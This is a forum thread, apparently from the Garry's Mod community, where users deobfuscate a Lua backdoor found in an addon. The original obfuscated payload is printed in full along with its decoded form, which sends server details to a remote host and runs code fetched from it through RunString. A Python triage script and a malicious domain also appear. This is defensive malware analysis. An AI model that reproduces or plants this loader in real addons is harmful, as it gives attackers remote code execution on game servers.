• Another Backdoor?!
    18 replies, posted
Another backdoor... When will these end?

local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_,16),53)) end return ‪‪‪‪‪ end ‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,function ()‪[‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'655a4641'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',{[‪‪‪‪‪‪‪'56']=‪[‪‪‪‪‪‪‪'52585a51'][‪‪‪‪‪‪‪'72504172545850585a5150']()[‪‪‪‪‪‪‪'7b545850'],[‪‪‪‪‪‪‪'50']=‪[‪‪‪‪‪‪‪'52545850'][‪‪‪‪‪‪‪'7250417c6574515147504646'](),[‪‪‪‪‪‪‪'51']=‪[‪‪‪‪‪'7250417d5a46417b545850']()})end )‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,function ()‪[‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'735041565d'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (‪‪return)‪[‪‪‪‪‪‪‪'67405b6641475c5b52'](‪‪return)end ,nil )end )

So I have no idea what kind of language this is in, but it's not base64 for sure. If you find something, please tell me, either on here or at my Discord: Floppydisk#5039
...so you're just gonna post it but not tell us what it is? (Even so, you should be reporting the addon instead of posting about it)
Was bored.

local _G = _G
local string = _G['string']            -- _G['\115\116\114\105\110\103']
local bit_bxor = _G['bit']['bxor']     -- _G['\98\105\116']['\98\120\111\114']
local function GetFunctionString(param)
    if string.len(param) == 0 then     -- if string['\108\101\110'](param) == 0 then
        return param
    end
    local str = ''
    for _ in string.gmatch(param, '..') do -- for _ in string['\103\109\97\116\99\104'](param,'\46\46') do
        str = str .. string.char(bit_bxor(tonumber(_,16), 53)) -- str=str..string['\99\104\97\114'](bit_bxor(_G["\116\111\110\117\109\98\101\114"](_,16),53))
    end
    return str
end
timer.Simple(5, function() -- _G[GetFunctionString('415c585047')][GetFunctionString('665c58455950')](5,function ()
    http.Post("<REDACTED_URL>/tracker.php", function(param) -- huge mess that's too long to put here
        RunString(param) -- _G[GetFunctionString('67405b6641475c5b52')](param)
    end , nil )
end )

I.e., it pings the malicious webhost and grabs a payload that runs on your server.
What did you use to decode it?
Probably doesn't want to reveal that he cracked addons.
Notepad++. They are using non-breaking spaces to try to hide the assigned variables. The escaped strings are fairly straightforward (in server, lua_run print('\xzy etc etc')). The first function takes the input string 2 ASCII characters at a time, converts them to hexadecimal, XORs them with 53 (110101), and then converts them back into an ASCII character. All of that work is just to try to hide the http.Post and RunString calls to avoid being detected.
I am confused. Not trying to push you or anything but I really don't understand the process of how to do it.
The first step is knowing Lua, so you can format the obfuscated code in a more human-readable way. I started by just adding a new line between every place I knew one should go, like after a local variable assignment.

-- Original
local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] ..........

-- Modified - just add new lines where they should go
local ‪ = _G
local ‪‪ = ‪['\115\116\114\105\110\103']
local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114']
local function ‪‪‪‪‪‪‪(‪‪‪‪)
    if ‪‪['\108\101\110'](‪‪‪‪) == 0 then
        return ‪‪‪‪
    end
    local ‪‪‪‪‪ = ''
    for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46\46') do
        ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_,16),53))
    end
    return ‪‪‪‪‪
end
‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,function ()
    ‪[‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'655a4641'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',
    {
        [‪‪‪‪‪‪‪'56']=‪[‪‪‪‪‪‪‪'52585a51'][‪‪‪‪‪‪‪'72504172545850585a5150']()[‪‪‪‪‪‪‪'7b545850'],
        [‪‪‪‪‪‪‪'50']=‪[‪‪‪‪‪‪‪'52545850'][‪‪‪‪‪‪‪'7250417c6574515147504646'](),
        [‪‪‪‪‪‪‪'51']=‪[‪‪‪‪‪'7250417d5a46417b545850']()
    })
end )
‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,function ()
    ‪[‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'735041565d'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (‪‪return)
        ‪[‪‪‪‪‪‪‪'67405b6641475c5b52'](‪‪return)
    end ,nil )
end )

Then I just started replacing all of the escaped strings (e.g. ‪['\115\116\114\105\110\103']) with their actual string representations by just printing them in console.
lua_run print('\115\116\114\105\110\103') ---> string

local ‪ = _G
local ‪‪ = ‪['string']
local ‪‪‪ = ‪['bit']['bxor']
local function ‪‪‪‪‪‪‪(‪‪‪‪)
    if ‪‪['len'](‪‪‪‪) == 0 then
        return ‪‪‪‪
    end
    local ‪‪‪‪‪ = ''
    for _ in ‪‪['gmatch'](‪‪‪‪,'..') do
        ‪‪‪‪‪=‪‪‪‪‪..‪‪['char'](‪‪‪(‪["tonumber"](_,16),53))
    end
    return ‪‪‪‪‪
end
‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,function ()
    ‪[‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'655a4641'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',
    {
        [‪‪‪‪‪‪‪'56']=‪[‪‪‪‪‪‪‪'52585a51'][‪‪‪‪‪‪‪'72504172545850585a5150']()[‪‪‪‪‪‪‪'7b545850'],
        [‪‪‪‪‪‪‪'50']=‪[‪‪‪‪‪‪‪'52545850'][‪‪‪‪‪‪‪'7250417c6574515147504646'](),
        [‪‪‪‪‪‪‪'51']=‪[‪‪‪‪‪'7250417d5a46417b545850']()
    })
end )
‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,function ()
    ‪[‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'735041565d'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (‪‪return)
        ‪[‪‪‪‪‪‪‪'67405b6641475c5b52'](‪‪return)
    end ,nil )
end )

Then I found the non-breaking spaces and just copy pasted a single one of them and replaced every instance of them with something stupid like 'A'.
local A = _G
local AA = A['string']
local AAA = A['bit']['bxor']
local function AAAAAAA(AAAA)
    if AA['len'](AAAA) == 0 then
        return AAAA
    end
    local AAAAA = ''
    for _ in AA['gmatch'](AAAA,'..') do
        AAAAA=AAAAA..AA['char'](AAA(A["tonumber"](_,16),53))
    end
    return AAAAA
end
A[AAAAAAA'415c585047'][AAAAAAA'665c58455950'](5,function ()
    A[AAAAAAA'5d414145'][AAAAAAA'655a4641'](AAAAAAA'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45',
    {
        [AAAAAAA'56']=A[AAAAAAA'52585a51'][AAAAAAA'72504172545850585a5150']()[AAAAAAA'7b545850'],
        [AAAAAAA'50']=A[AAAAAAA'52545850'][AAAAAAA'7250417c6574515147504646'](),
        [AAAAAAA'51']=A[AAAAA'7250417d5a46417b545850']()
    })
end )
A[AAAAAAA'415c585047'][AAAAAAA'665c58455950'](5,function ()
    A[AAAAAAA'5d414145'][AAAAAAA'735041565d'](AAAAAAA'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',function (AAreturn)
        A[AAAAAAA'67405b6641475c5b52'](AAreturn)
    end ,nil )
end )

From there, knowing Lua again helps, because it's pretty easy to rename these variables to their true identity. Something like AAAAAAA'415c585047' is a function call, where AAAAAAA is the function and '415c585047' is the parameter. It really looks like this: AAAAAAA('415c585047'). That function transforms the inputted string into an actual function name, which is indexed into _G to grab the corresponding function.
I'm confused.. again.. I'm typing this in my server console:

lua_run function AAAAAAA('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054') print(a) end
> function AAAAAAA('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054') print(a) end...
[ERROR] lua_run:1: <name> or '...' expected near ''5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054''
  1. unknown - lua_run:0
Yeah, I can see where you are confused. AAAAAAA('5d414....etc etc') is a function CALL. The function itself (AAAAAAA) is already defined in the middle of the code I pasted. Look at my first post and look at the GetFunctionString function. That is my name for AAAAAAA, because it takes a seemingly random looking set of characters and transforms it into stuff like 'http', 'game', 'gmod', etc.
lua_run function GetFunctionString(5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054) print(AAA) end
> function GetFunctionString(5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054) print(AAA) end...
[ERROR] lua_run:1: malformed number near '5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054'
  1. unknown - lua_run:0
It's pretty clear you don't have the basics down, and I can't really spoonfeed you too much longer. Either put the GetFunctionString code that I posted above into a file on your server, or add it through your console with the following:

lua_run function GetFunctionString(param) if string.len(param) == 0 then return param end local str = '' for _ in string.gmatch(param, '..') do str = str .. string.char(bit.bxor(tonumber(_,16), 53)) end return str end

Then you can do stuff like this in console:

lua_run print(GetFunctionString('415c585047'))
> print(GetFunctionString('415c585047'))
timer

That's all I did to find out what functions he was calling in the obfuscated code. My original post already shows all of the deobfuscated functions.
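The decoding steps above (hex pairs XORed with 53, then the decoded names indexed out of the _G alias) as an added, stand-alone Python triage script; this is not code from the thread. It assumes the decoder alias is AAAAAAA as in the renamed post, the hex values are the ones quoted in the thread, and the remote URL is replaced by a placeholder variable url.

```python
import re

# Key used by the sample in this thread: every hex pair is XORed with 53 (0x35).
XOR_KEY = 53

# Names whose appearance after decoding point at remote code loading/execution.
SUSPICIOUS = ("RunString", "CompileString", "http.Post", "http.Fetch")


def decode_literal(hex_str, key=XOR_KEY):
    """Mirror of the obfuscator's helper (GetFunctionString in the thread):
    read the string two hex digits at a time, parse each pair as a number,
    XOR it with the key and emit the resulting character. Like Lua's
    gmatch(s, '..'), a trailing unpaired digit is silently dropped."""
    if not hex_str:
        return hex_str
    pairs = range(0, len(hex_str) - 1, 2)
    return "".join(chr(int(hex_str[i:i + 2], 16) ^ key) for i in pairs)


def deobfuscate(source, decoder_name, key=XOR_KEY):
    """Replace every decoder call (written as NAME'hex' or NAME('hex')) with
    the string it yields, then collapse index chains such as
    A['http']['Fetch'] into A.http.Fetch so the real API calls are readable."""
    call = re.compile(r"\b" + re.escape(decoder_name) + r"\(?'([0-9a-fA-F]+)'\)?")
    text = call.sub(lambda m: "'" + decode_literal(m.group(1), key) + "'", source)
    chain = re.compile(r"(\w+)\['(\w+)'\]")
    while True:
        collapsed = chain.sub(r"\1.\2", text)
        if collapsed == text:
            return text
        text = collapsed


def flag_suspicious(decoded):
    """Return the dangerous names present in the decoded source, sorted."""
    return sorted(name for name in SUSPICIOUS if name in decoded)


# Constructed sample (assumption) in the style of the thread's second timer
# block: decoder alias AAAAAAA, hex literals quoted in the thread, and the
# remote URL replaced by the placeholder variable url.
SAMPLE = (
    "A[AAAAAAA'415c585047'][AAAAAAA'665c58455950'](5,function ()\n"
    "  A[AAAAAAA'5d414145'][AAAAAAA'735041565d'](url,function (r)\n"
    "    A[AAAAAAA'67405b6641475c5b52'](r)\n"
    "  end ,nil ) end )\n"
)

if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE, "AAAAAAA")
    print(cleaned)
    print("flagged:", flag_suspicious(cleaned))
```

Running it turns the sample into timer.Simple / http.Fetch / RunString calls and flags the last two, which is the signature to look for when auditing a leaked addon.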
If an addon has code from gastheje.ws/chamber/gas.lua or is running code from that site, you can count on it being up to no good; you should report it. Email rubat or willox about the addon.
I'm pretty sure this isn't a workshop addon; the guy admitted to using gmodstore leaks in the GLua Discord earlier.
Never trust leaked addons.
How did they encrypt it?
Please don't enter that field.